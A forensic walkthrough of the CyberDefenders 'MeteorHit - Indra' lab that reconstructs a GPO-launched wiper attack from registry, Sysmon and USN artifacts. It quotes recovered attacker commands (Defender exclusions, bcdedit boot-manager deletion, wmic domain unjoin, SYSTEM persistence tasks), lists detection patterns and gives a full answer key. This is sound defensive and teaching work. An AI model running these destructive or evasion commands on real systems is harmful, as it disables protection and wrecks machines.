MeteorHit - Indra Walkthrough | CyberDefenders Lab

Scenario

A critical network infrastructure experienced operational disruption after multiple systems were compromised and wiped. Public message boards displayed politically charged messages, and the initial investigation suggested that the attackers abused Active Directory and deployed destructive malware across domain-joined machines.

The evidence provided for this lab was a KAPE SANS Triage collection from one of the affected machines. The collection was not a full disk image, but it preserved several high-value forensic artifacts such as registry hives, Windows event logs, Prefetch, Amcache, scheduled tasks, $MFT, $LogFile, and $Extend.

The activity in this lab closely resembles the MeteorExpress attack chain documented by SentinelLABS, where Group Policy was abused to execute a setup script, stage payloads, extract archives, deploy wiper components, and use a screen-locking component to prevent user access.

Evidence and Triage Approach

Before answering the lab questions, I performed a quick black-box triage to understand what evidence was available.

Important artifacts in the collection included:

C\Windows\System32\winevt\Logs
C\Windows\System32\config
C\Windows\Prefetch
C\Windows\AppCompat\Programs\Amcache.hve
C\Windows\System32\Tasks
C\$MFT
C\$LogFile
C\$Extend
C\ProgramData

The host context identified during triage was:

Hostname: DESKTOP-VBIOB4B
Domain: abc.local
Time zone: Pacific Standard Time
Observed users: Farid_Ebrahim, fred, Administrator, Guest

The SOFTWARE hive was reported as a dirty hive when loaded in Registry Explorer. Replaying registry transaction logs was important because some Group Policy script configuration was not visible in the initial hive view. After replaying the hive logs, the Group Policy script registry data became available.

For process execution analysis, Sysmon was the most valuable source. I parsed Sysmon logs with EvtxECmd.exe and reviewed the CSV in Timeline Explorer for broad filtering. For exact field extraction such as Image, CommandLine, ProcessId, ParentProcessId, Hashes, and parent-child relationships, Sysmon Event ID 1 was the primary artifact.

EvtxECmd.exe -f "C:\Users\Administrator\Desktop\Start Here\Artifacts\C\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx" --csv "C:\Users\Administrator\Desktop\Start Here\Output"

Timeline Explorer made it easier to filter values such as:

setup.bat
expand.exe
env.cab
Rar.exe
Add-MpPreference
schtasks
bcdedit
wmic
mssetup.exe
msuser.reg

Q1. The attack began with using a Group Policy Object (GPO) to execute a malicious batch file. What is the name of the malicious GPO responsible for initiating the attack by running a script?

The first lead was Group Policy script execution. I initially checked:

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History

This showed Group Policy-related GUIDs, but not every GUID under this path is a GPO ID. Some GUIDs are Client-Side Extension GUIDs, which represent Group Policy processing components such as registry policy, security settings, or script processing.

The useful data became visible after replaying the dirty SOFTWARE hive transaction logs. The script configuration was found under the Group Policy script registry area:

Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup\0

The registry values showed the GPO metadata:

GPO-ID: cn={8C069217-9EBB-454D-BE84-32317C017A0C},cn=policies,cn=system,DC=abc,DC=local
FileSysPath: \\abc.local\SysVol\abc.local\Policies\{8C069217-9EBB-454D-BE84-32317C017A0C}\Machine
DisplayName: DeploySetup
GPOName: {8C069217-9EBB-454D-BE84-32317C017A0C}

The child script entry showed that the GPO executed:

setup.bat

GPO script registry evidence

Answer: DeploySetup


Q2. During the investigation, a specific file containing critical components necessary for the later stages of the attack was found on the system. This file, expanded using a built-in tool, played a crucial role in staging the malware. What is the name of the file, and where was it located on the system? Please provide the full file path.

After identifying the GPO-based setup.bat execution, I pivoted into Sysmon Event ID 1 to reconstruct commands launched by the script.

The parent command line repeatedly pointed back to the GPO-launched batch file:

ParentCommandLine: C:\Windows\system32\cmd.exe /c ""\\WIN-499DAFSKAR7\Data\scripts\setup.bat" "

One important command showed the Windows built-in expand.exe utility being used to extract a CAB archive:

expand "C:\ProgramData\Microsoft\env\env.cab" /F:* "C:\ProgramData\Microsoft\env"

expand.exe is a built-in Windows utility commonly used to extract CAB archives. In this case, it was used to unpack the archive that staged files required for the next phase of execution.

The file expanded by the script was:

C:\ProgramData\Microsoft\env\env.cab

The path is suspicious because it uses a Microsoft-looking directory under ProgramData, but C:\ProgramData\Microsoft\env\ is not a normal Windows system binary or update location.

The full list of notable commands tied to setup.bat also showed broader staging and defense-evasion behavior:

schtasks /delete /tn "Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeAll" /F
hostname
expand "C:\ProgramData\Microsoft\env\env.cab" /F:* "C:\ProgramData\Microsoft\env"
"Rar.exe" x "C:\ProgramData\Microsoft\env\programs.rar" -phackemall
ipconfig /release
powershell -Command "Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($_.NetEnabled) { $_.Disable() } }"
reg query "HKLM\SOFTWARE\KasperskyLab"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\update.bat'"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\Rar.exe'"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\programs.rar'"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\cache.bat'"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\ms.rar'"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\msrun.bat'"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\mssetup.exe'"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\msconf.conf'"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\bcd.bat'"
powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\env.exe'"
"Rar.exe" x "C:\ProgramData\Microsoft\env\bcd.rar" -phackemall
bcdedit /v | findstr identifier
"Rar.exe" x "C:\ProgramData\Microsoft\env\ms.rar" -phackemall
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP" /v LockScreenImagePath /t REG_SZ /d C:\temp\mscap.jpg /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP" /v LockScreenImageUrl /t REG_SZ /d C:\temp\mscap.jpg /f
powershell -command "(Get-Date).AddMinutes(3.5).ToString('HH:mm:ss')"
schtasks /CREATE /SC ONCE /ST 09:08:13 /TN "mstask" /RL HIGHEST /RU SYSTEM /TR "\"C:\ProgramData\Microsoft\env\env.exe\" C:\temp\msconf.conf"
ping localhost -n 20

Answer: C:\ProgramData\Microsoft\env\env.cab


Q3. The attacker employed password-protected archives to conceal malicious files, making it important to uncover the password used for extraction. Identifying this password is key to accessing the contents and analyzing the attack further. What is the password used to extract the malicious files?

The setup.bat command line showed Rar.exe extracting password-protected archives.

The relevant commands were:

"Rar.exe" x "C:\ProgramData\Microsoft\env\programs.rar" -phackemall
"Rar.exe" x "C:\ProgramData\Microsoft\env\bcd.rar" -phackemall
"Rar.exe" x "C:\ProgramData\Microsoft\env\ms.rar" -phackemall

The -p option supplies the password to Rar.exe. Here, the password was provided inline as:

hackemall

Sysmon file creation evidence also showed Rar.exe extracting additional files into the staging directory:

C:\ProgramData\Microsoft\env\cache.bat
C:\ProgramData\Microsoft\env\bcd.bat
C:\ProgramData\Microsoft\env\msrun.bat
C:\ProgramData\Microsoft\env\mssetup.exe

Answer: hackemall


Q4. Several commands were executed to add exclusions to Windows Defender, preventing it from scanning specific files. This behavior is commonly used by attackers to ensure that malicious files are not detected by the system’s built-in antivirus. Tracking these exclusion commands is crucial for identifying which files have been protected from antivirus scans. What is the name of the first file added to the Windows Defender exclusion list?

The batch script used PowerShell to add Microsoft Defender exclusions through Add-MpPreference.

The first observed exclusion command was:

powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\update.bat'"

This exclusion was observed at approximately:

2024-09-24 16:04:23 UTC

Attackers commonly use Defender exclusions to prevent malicious scripts, tools, archives, and payloads from being scanned or quarantined.

Answer: update.bat


Q5. A scheduled task has been configured to execute a file after a set delay. Understanding this delay is important for investigating the timing of potential malicious activity. How many seconds after the task creation time is it scheduled to run?

The script calculated a time offset using PowerShell:

C:\Windows\system32\cmd.exe /c powershell -command "(Get-Date).AddMinutes(3.5).ToString('HH:mm:ss')"

It then used the calculated time to create a one-time scheduled task named mstask:

schtasks /CREATE /SC ONCE /ST 09:08:13 /TN "mstask" /RL HIGHEST /RU SYSTEM /TR "\"C:\ProgramData\Microsoft\env\env.exe\" C:\temp\msconf.conf"

The delay was 3.5 minutes.

3.5 minutes x 60 seconds = 210 seconds

Answer: 210


Q6. After the malware execution, the wmic utility was used to unjoin the computer system from a domain or workgroup. Tracking this operation is essential for identifying system reconfigurations or unauthorized changes. What is the Process ID (PID) of the utility responsible for performing this action?

Sysmon Event ID 1 showed WMIC.exe being used to unjoin the machine from the domain or workgroup.

The process creation event showed:

TimeCreated: 9/24/2024 4:08:01 PM
User: NT AUTHORITY\SYSTEM
Image: C:\Windows\SysWOW64\wbem\WMIC.exe
CommandLine: wmic computersystem where name="DESKTOP-VBIOB4B" call unjoindomainorworkgroup
ProcessId: 7492
ParentImage: C:\Windows\SysWOW64\cmd.exe
ParentCommandLine: C:\Windows\System32\cmd.exe /c wmic computersystem where name="%computername%" call unjoindomainorworkgroup
ParentProcessId: 7200

The PID of the WMIC.exe process was:

7492

Answer: 7492


Q7. The malware executed a command to delete the Windows Boot Manager, a critical component responsible for loading the operating system during startup. This action can render the system unbootable, leading to serious operational disruptions and making recovery more difficult. What command did the malware use to delete the Windows Boot Manager?

After env.exe was launched with msconf.conf, it spawned commands related to boot configuration tampering.

The process chain showed:

C:\ProgramData\Microsoft\env\env.exe C:\temp\msconf.conf
  -> C:\Windows\SysWOW64\cmd.exe
    -> C:\Windows\System32\bcdedit.exe

The Sysmon event showed the command used to delete the Windows Boot Manager object:

Image: C:\Windows\System32\bcdedit.exe
CommandLine: C:\Windows\Sysnative\bcdedit.exe /delete {9dea862c-5cdd-4e70-acc1-f32b344d4795} /f
ProcessId: 7528
ParentImage: C:\Windows\SysWOW64\cmd.exe
ParentProcessId: 7548

The GUID {9dea862c-5cdd-4e70-acc1-f32b344d4795} represents the Windows Boot Manager object in BCD. Deleting this object can affect system bootability and recovery.

Answer: C:\Windows\Sysnative\bcdedit.exe /delete {9dea862c-5cdd-4e70-acc1-f32b344d4795} /f


Q8. The malware created a scheduled task to ensure persistence and maintain control over the compromised system. This task is configured to run with elevated privileges every time the system starts, ensuring the malware continues to execute. What is the name of the scheduled task created by the malware to maintain persistence?

The malware later created another scheduled task for startup persistence.

The command observed in Sysmon was:

C:\Windows\System32\cmd.exe /c schtasks /CREATE /SC ONSTART /TN "Aa153!EGzN" /RL HIGHEST /RU SYSTEM /TR "\"C:\ProgramData\Microsoft\env\env.exe\" \"C:\temp\msconf.conf\"" /F

Breaking down the important parts:

/SC ONSTART    Run at system startup
/TN            Task name
/RL HIGHEST    Run with highest privileges
/RU SYSTEM     Run as NT AUTHORITY\SYSTEM
/TR            Execute env.exe with msconf.conf

The task name was:

Aa153!EGzN

This is suspicious because the task runs from an unusual ProgramData path and uses a random-looking task name.

Answer: Aa153!EGzN


Q9. A malicious program was used to lock the screen, preventing users from accessing the system. Investigating this malware is important to identify its behavior and mitigate its impact. What is the name of this malware? (not the filename)

After env.exe executed with msconf.conf, Sysmon showed it launching the screen-locking component:

ParentCommandLine: C:\ProgramData\Microsoft\env\env.exe C:\temp\msconf.conf
CommandLine: "C:\temp\mssetup.exe" /LOCK

The question asks for the malware name, not the filename. The filename observed in the process execution was mssetup.exe, but the lab-identified malware name for the screen-locking component was:

 BreakWin

This behavior also aligns with the broader MeteorExpress-style chain where the wiper activity is accompanied by a screen-locking component.

Answer: BreakWin


Q10. The disk shows a pattern where malware overwrites data (potentially with zero-bytes) and then deletes it, a behavior commonly linked to Wiper malware activity. The USN (Update Sequence Number) is vital for tracking filesystem changes on an NTFS volume, enabling investigators to trace when files are created, modified, or deleted, even if they are no longer present. This is critical for building a timeline of file activity and detecting potential tampering. What is the USN associated with the deletion of the file msuser.reg?

This question required analyzing the NTFS USN Journal, not just $MFT.

The difference matters:

$MFT      -> File metadata and timestamps
$UsnJrnl  -> File-system change history

$MFT can show that a file existed and provide metadata such as timestamps and file references. The USN Journal records file-system changes such as file creation, data overwrite, rename, and deletion. That makes it especially useful in wiper investigations.

I parsed the USN Journal with MFTECmd and reviewed the CSV in Timeline Explorer.

MFTECmd.exe -f "C:\Users\Administrator\Desktop\Start Here\Artifacts\C\$Extend\$J" --csv "C:\Users\Administrator\Desktop\Start Here\Output"

In Timeline Explorer, I filtered for:

msuser.reg

The relevant row showed a deletion event:

Name: msuser.reg
Update Reason: FileDelete
Update Sequence Number: 11721008

USN Journal deletion evidence

Answer: 11721008


Reconstructed Attack Timeline

The final attack flow reconstructed from registry, Sysmon, scheduled task, and NTFS artifacts was:

1. Malicious GPO "DeploySetup" executes setup.bat.
2. setup.bat stages payloads under C:\ProgramData\Microsoft\env.
3. expand.exe extracts C:\ProgramData\Microsoft\env\env.cab.
4. Rar.exe extracts password-protected archives using password "hackemall".
5. setup.bat adds Microsoft Defender exclusions for staged files.
6. A delayed scheduled task "mstask" is configured to run env.exe with msconf.conf.
7. env.exe executes destructive and system modification actions.
8. WMIC.exe unjoins the host from the domain/workgroup.
9. bcdedit.exe deletes the Windows Boot Manager BCD object.
10. A startup persistence task "Aa153!EGzN" is created.
11. mssetup.exe /LOCK is launched as the screen-locking component.
12. USN Journal records show wiper-like deletion activity for msuser.reg.

Indicators of Compromise

Files and Paths

\\WIN-499DAFSKAR7\Data\scripts\setup.bat
C:\ProgramData\Microsoft\env\env.cab
C:\ProgramData\Microsoft\env\Rar.exe
C:\ProgramData\Microsoft\env\programs.rar
C:\ProgramData\Microsoft\env\bcd.rar
C:\ProgramData\Microsoft\env\ms.rar
C:\ProgramData\Microsoft\env\update.bat
C:\ProgramData\Microsoft\env\cache.bat
C:\ProgramData\Microsoft\env\bcd.bat
C:\ProgramData\Microsoft\env\msrun.bat
C:\ProgramData\Microsoft\env\mssetup.exe
C:\ProgramData\Microsoft\env\msconf.conf
C:\ProgramData\Microsoft\env\env.exe
C:\temp\msconf.conf
C:\temp\mssetup.exe
C:\temp\mscap.jpg
msuser.reg

Scheduled Tasks

mstask
Aa153!EGzN

Notable Commands

expand "C:\ProgramData\Microsoft\env\env.cab" /F:* "C:\ProgramData\Microsoft\env"

"Rar.exe" x "C:\ProgramData\Microsoft\env\programs.rar" -phackemall

powershell -Command "Add-MpPreference -Force -ExclusionPath 'C:\ProgramData\Microsoft\env\update.bat'"

schtasks /CREATE /SC ONCE /ST 09:08:13 /TN "mstask" /RL HIGHEST /RU SYSTEM /TR "\"C:\ProgramData\Microsoft\env\env.exe\" C:\temp\msconf.conf"

wmic computersystem where name="DESKTOP-VBIOB4B" call unjoindomainorworkgroup

C:\Windows\Sysnative\bcdedit.exe /delete {9dea862c-5cdd-4e70-acc1-f32b344d4795} /f

schtasks /CREATE /SC ONSTART /TN "Aa153!EGzN" /RL HIGHEST /RU SYSTEM /TR "\"C:\ProgramData\Microsoft\env\env.exe\" \"C:\temp\msconf.conf\"" /F

"C:\temp\mssetup.exe" /LOCK

Detection Opportunities

GPO Script Abuse

Monitor for Group Policy scripts launching command interpreters from SYSVOL or administrative shares.

gpscript.exe -> cmd.exe -> setup.bat
cmd.exe /c "\\*\Data\scripts\*.bat"

Archive Staging with Built-in Utilities

Alert on expand.exe extracting archives into suspicious ProgramData paths.

expand.exe *.cab /F:* C:\ProgramData\*

Password-Protected Archive Extraction

Monitor suspicious archive extraction with passwords in command line.

Rar.exe x *.rar -p*

Defender Exclusions

Alert on Defender exclusions added for scripts, archives, and executables under user-writable or unusual paths.

powershell.exe Add-MpPreference -ExclusionPath C:\ProgramData\*

Scheduled Task Persistence

Detect scheduled tasks running as SYSTEM from unusual paths.

schtasks.exe /CREATE /SC ONSTART /RU SYSTEM

Boot Configuration Tampering

Detect destructive bcdedit.exe usage.

bcdedit.exe /delete
bcdedit.exe /set recoveryenabled No
bcdedit.exe /set bootstatuspolicy ignoreallfailures

Domain/Workgroup Tampering

Detect wmic.exe unjoin operations.

wmic computersystem call unjoindomainorworkgroup

Screen Locking Behavior

Monitor execution of suspicious binaries with /LOCK and registry modifications to lock screen configuration.

mssetup.exe /LOCK
PersonalizationCSP
LockScreenImagePath
LockScreenImageUrl

Wiper-Like USN Patterns

During incident response, inspect USN Journal records for sequences such as:

DataOverwrite
DataTruncation
FileDelete
Close

Lessons Learned

This lab was a good reminder that destructive malware investigations require more than finding a suspicious executable. The attack chain became clear only after correlating registry, Sysmon, scheduled tasks, and NTFS artifacts.

The most useful evidence sources were:

Registry          -> GPO script configuration and startup script metadata
Sysmon            -> Process execution, command lines, PIDs, hashes, parent-child chains
Scheduled Tasks   -> Delayed execution and startup persistence
Prefetch          -> Execution support
USN Journal       -> File-system change and deletion history

A key lesson was that Group Policy artifacts can be confusing because registry paths may contain both actual GPO GUIDs and Client-Side Extension GUIDs. Treating every GUID as a GPO ID can lead to wrong conclusions.

Another important lesson was the value of replaying registry transaction logs when working with offline hives. In this case, replaying the dirty hive made the Group Policy script information visible.

For timeline review, EvtxECmd.exe and Timeline Explorer were useful for broad filtering, while direct Sysmon XML parsing was better for exact fields such as ProcessId, ParentProcessId, Image, CommandLine, and Hashes.


Final Answers

Question Answer
Q1 DeploySetup
Q2 C:\ProgramData\Microsoft\env\env.cab
Q3 hackemall
Q4 update.bat
Q5 210
Q6 7492
Q7 C:\Windows\Sysnative\bcdedit.exe /delete {9dea862c-5cdd-4e70-acc1-f32b344d4795} /f
Q8 Aa153!EGzN
Q9 BreakWin
Q10 11721008

References